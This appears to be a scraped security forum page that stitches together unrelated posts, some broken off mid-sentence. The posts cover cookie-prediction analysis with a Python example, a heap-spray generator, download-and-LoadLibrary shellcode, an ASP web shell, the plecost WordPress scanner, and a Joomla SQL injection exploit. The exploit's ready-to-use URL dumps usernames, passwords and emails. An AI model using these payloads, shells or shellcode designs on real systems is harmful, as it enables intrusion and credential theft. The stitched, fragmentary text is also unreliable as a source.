been, according to the arrogant rules of Microsoft, et al," wrote Young. There's more on the Cryptome site, including correspondence. ® source: theregister.co.uk
-
Cookie Monster is a cookie analysis tool written in Python. Cookie Monster will grab cookies from a host and assign each character a number. This number can be used to perform mathematical calculations on the differences in order to find a pattern and see if cookie prediction is possible. http://packetstormsecurity.org/web/cookiemonster_v1.6.zip
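As an added example (not the Cookie Monster code itself), here is a small offline Python version of the analysis described above, run on constructed sample cookies from a hypothetical weak generator: each character is mapped to a number, per-position differences between successive samples are taken, and positions that never change or step by a fixed amount are flagged, which is what tells you whether your own session cookies could be predicted.

```python
from typing import Dict, List

# Constructed sample: five cookies from a hypothetical weak generator (a fixed
# prefix, a counter that steps by one, and a two-character random suffix).
SAMPLE_COOKIES = [
    "sess-00101-k3",
    "sess-00102-ax",
    "sess-00103-q9",
    "sess-00104-zt",
    "sess-00105-m1",
]


def encode(cookie: str) -> List[int]:
    """Assign each character a number (its code point), as the tool does."""
    return [ord(ch) for ch in cookie]


def position_deltas(cookies: List[str]) -> List[List[int]]:
    """Per character position, the differences between consecutive samples."""
    if len({len(c) for c in cookies}) != 1:
        raise ValueError("all sampled cookies must have the same length")
    rows = [encode(c) for c in cookies]
    return [
        [rows[i + 1][pos] - rows[i][pos] for i in range(len(rows) - 1)]
        for pos in range(len(rows[0]))
    ]


def classify(deltas: List[int]) -> str:
    """constant: never changes; linear: same non-zero step each time; varying: else."""
    if all(d == 0 for d in deltas):
        return "constant"
    if len(set(deltas)) == 1:
        return "linear"
    return "varying"


def analyze(cookies: List[str]) -> Dict[int, str]:
    """Classify every character position across the sampled cookies."""
    return {pos: classify(d) for pos, d in enumerate(position_deltas(cookies))}


def summary(cookies: List[str]) -> Dict[str, int]:
    """Count positions per class; only 'varying' positions add unpredictability."""
    counts = {"constant": 0, "linear": 0, "varying": 0}
    for kind in analyze(cookies).values():
        counts[kind] += 1
    return counts
```

On the constructed sample only two of thirteen positions vary, so the cookie is far weaker than its length suggests.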
-
At what maximum speed?
-
This page can help you generate a small piece of JavaScript that performs a heap spray. The heap spray uses the provided target address as the value to spray the heap with (e.g. 0x01020304 means spray with "04 03 02 01 04 03 02 01 etc..."). You can choose which browser you are targeting, which is needed to determine the size of the header for heap blocks (you can also enter this size manually). Finally, you can provide a shellcode to put at the end of each nopslide. The default shellcode is one that executes calc.exe. Skypher
-
Everyone and their dog seems to want to use download and execute shellcode in their exploits, even though this has some drawbacks: * You need to create an .exe file on the system, which will very likely draw unwanted attention. * You cannot use an API that downloads your file to a temporary location, because that will likely not retain the .exe extension. * You need to make an assumption about where a safe place is to write your .exe file, which means you can guess wrong and the code fails. * You need to store the string '.exe' in the download & execute shellcode, which means this is 4 bytes larger. * You need to spawn an extra process, which will very likely draw attention. * You leave cleaning up the exploited process to the download & execute shellcode, which means this needs to be larger. To get around these problems, I created download and LoadLibrary shellcode: a shellcode that will download a DLL file to a temporary file and load it into the exploited process using LoadLibrary. The benefits of this approach are: * Smaller code. * You can use the URLDownloadToCacheFileA API function in urlmon that downloads and saves your DLL to a temporary file, meaning you do not need to provide a location. * No need to create an .exe file on the system: the extension of a DLL is irrelevant. * No need to spawn an extra process. * You can clean up the exploited process from the code in the DLL instead of the shellcode. The size of the final shellcode depends on the length of the URL for your DLL. For the most recent version of the code it is 138 bytes + the length of the URL. This is a pretty decent reduction from the average download and execute shellcodes of 200+ bytes (excluding the URL) that I found around the interwebs. Project homepage: w32-dl-loadlib-shellcode - Project Hosting on Google Code source
-
Today I am releasing another old project called ASPsh. The goal of this project was to create an ASP page that can be used on a server to provide a "command line shell"-like experience when opening the page in a web browser. It also allows uploading and downloading of files to and from the server. I hope the screenshot below explains what that means. Source code can be found here. Skypher
-
WordPress fingerprinting tool: plecost searches for and retrieves information about the plugin versions installed on WordPress systems. It can analyze a single URL or perform an analysis based on the results indexed by Google. Additionally, it displays the CVE code associated with each plugin. Plecost retrieves the information contained on websites powered by WordPress, and also allows a search on the results indexed by Google. We can also call it a WordPress vulnerability scanner. If we are about to perform penetration testing on many web servers and we know there are many web applications running on WordPress, Plecost will do the rest of the work and give us the CVE numbers, and we can try to exploit them. How to use: ./plecost-0.2.2-7-beta.py [options] [ URL | [-l num] -G] Sample: plecost -R plugins.txt -n 5 plecost -i plugin_list.txt -s 12 -M 30 -t 20 -o results.txt www.example1234.com plecost -i plugin_list.txt -s 12 -M 30 -o results.txt www.example1234.com ( Search plugins with a sleep time between 12 and 30 seconds for www.example1234.com ) Operating systems supported: it is a Perl script, so the only dependency is that the Perl modules should be installed. download plecost
-
75053d91412433bd2af46e8bc384850d ============================================================================== [?] Joomla com_about Remote Sql Injection Vulnerability ============================================================================== [?] Script: [Joomla] [?] Language: [ PHP ] [?] Founder: [ Snakespc Email:s-c-dz@hotmail.com - Site:sec-war.com/cc> ] [?] Greetz to:[ His0k4 sec-warTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ] ########################################################################### ===[ Exploit ]=== [?] http://server/index.php?option=com_about&task=view&id=-24+UNION SELECT 1,2,3,group_concat(username,0x3a,password,0x3a,email),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+jos_users-- [?]Author: Snakespc <- ###########################################################################
- 1 reply
-
- 1